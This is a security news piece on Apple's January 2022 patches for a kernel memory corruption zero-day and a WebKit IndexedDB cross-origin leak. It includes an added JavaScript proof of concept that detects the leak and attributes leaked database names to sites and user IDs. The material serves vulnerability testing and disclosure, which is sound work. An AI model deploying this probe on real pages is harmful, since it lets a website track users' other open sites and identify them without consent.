Apple recently released new versions of its operating systems, iOS 15.3 and macOS Monterey 12.2, which contain a number of security fixes, including patches for two zero-day vulnerabilities.
CVE-2022-22587
The first zero-day, CVE-2022-22587, is a memory corruption flaw that could allow a malicious application to execute arbitrary code with kernel privileges. The vulnerability lies in IOMobileFrameBuffer, the kernel extension that manages the framebuffer, the region of memory that holds the contents of the device's screen display.
The bug affects iOS, iPadOS and macOS Monterey, and the fix consists of improved input validation. Apple said it is aware of a report that the issue may have been actively exploited in the wild. Note that the iOS/iPadOS 15.3 update is available for iPhone 6s and later, all iPad Pro models, iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and the 7th-generation iPod touch.
CVE-2022-22594
The second zero-day fixed this month is CVE-2022-22594, a WebKit information disclosure vulnerability. It affects Safari on macOS as well as browsers on iOS and iPadOS, which are all built on WebKit. It was disclosed by researchers at FingerprintJS before a fix was available, and it could allow a snooping website to discover which sites the user has open in other tabs and, where a site embeds a user identifier in a database name, potentially identify the user.
The vulnerability is a cross-origin (same-origin policy) violation in the IndexedDB API (written "IndexDB" in Apple's advisory), the JavaScript API browsers provide for storing structured objects in a client-side NoSQL database. Database names are supposed to be visible only to the origin that created them; in the affected WebKit builds, a database created by one origin became visible by name to other origins active in the same browser session. Apple fixed the issue with improved input validation.
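The following is an added example (not code from the article or from FingerprintJS) of how a practitioner can check whether a browser still exhibits the cross-origin IndexedDB leak described above, and how a snooping page would turn leaked names into information. It assumes the standard `indexedDB.open()` and `indexedDB.databases()` browser APIs; the helper names `foreignNames`, `attribute` and `runProbe`, the `OWN_DB` name and the `KNOWN_PATTERNS` catalogue are this example's own, and the catalogue entries are constructed placeholders rather than real sites' database names.

```javascript
// Added example, not from the article. A patched browser must only ever return
// this page's own IndexedDB names from indexedDB.databases(); seeing names it
// never created means the cross-origin leak is still present.

// Unique name for the database this page creates for itself.
const OWN_DB = "leaktest-" + Math.random().toString(36).slice(2);

// CONSTRUCTED catalogue: patterns a snooping site might match leaked names
// against. Real patterns are site-specific; these are illustrative only.
const KNOWN_PATTERNS = [
  { site: "example-webmail", pattern: /^example-mail-user-(\d+)$/ },
  { site: "example-social", pattern: /^example-social-feed$/ },
];

// Pure helper: names visible now that were neither in the baseline snapshot
// nor created by us. In a correctly partitioned browser this is always [].
function foreignNames(baseline, current, ownNames) {
  const seen = new Set([...baseline, ...ownNames]);
  return current.filter((name) => !seen.has(name));
}

// Pure helper: attribute leaked names to sites via the catalogue. Returns
// {site, name, id} records; `id` is the first capture group, if any.
function attribute(names, catalogue) {
  const hits = [];
  for (const name of names) {
    for (const { site, pattern } of catalogue) {
      const m = pattern.exec(name);
      if (m) hits.push({ site, name, id: m[1] ?? null });
    }
  }
  return hits;
}

// Browser-only driver: create our own database, snapshot the name list, then
// poll. Any foreign name that appears later means the browser is vulnerable.
// Returns the baseline snapshot, or null when IndexedDB is unavailable (Node).
async function runProbe(intervalMs = 1000) {
  if (typeof indexedDB === "undefined" || typeof indexedDB.databases !== "function") {
    return null;
  }
  await new Promise((resolve, reject) => {
    const req = indexedDB.open(OWN_DB, 1);
    req.onsuccess = () => { req.result.close(); resolve(); };
    req.onerror = () => reject(req.error);
  });
  const baseline = (await indexedDB.databases()).map((d) => d.name);
  setInterval(async () => {
    const current = (await indexedDB.databases()).map((d) => d.name);
    const leaked = foreignNames(baseline, current, [OWN_DB]);
    if (leaked.length > 0) {
      console.warn("VULNERABLE: foreign IndexedDB names visible:", leaked);
      console.warn("attributed:", attribute(leaked, KNOWN_PATTERNS));
    }
  }, intervalMs);
  return baseline;
}
```

To use it, serve the script from a page on one origin, call `runProbe()` from that page, then open other sites in further tabs of the same browser session; on an unpatched Safari 15 / iOS 15 build, names created by those sites show up in the warnings, while a patched browser never reports anything beyond its own `OWN_DB`.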
Patches for both vulnerabilities are available in the macOS Monterey 12.2 and iOS/iPadOS 15.3 updates. iOS 15.3 also fixes issues that could let an attacker gain root privileges, execute arbitrary code with kernel privileges, or obtain user files via iCloud.
It is noteworthy that attackers used another WebKit bug, CVE-2021-1801, in malvertising campaigns last year. That flaw allowed maliciously crafted web content to bypass the iframe sandboxing policy of the WebKit browser engine, which powers Safari and, on iOS, all third-party browsers including Google Chrome; Apple fixed it with improved iframe sandbox enforcement.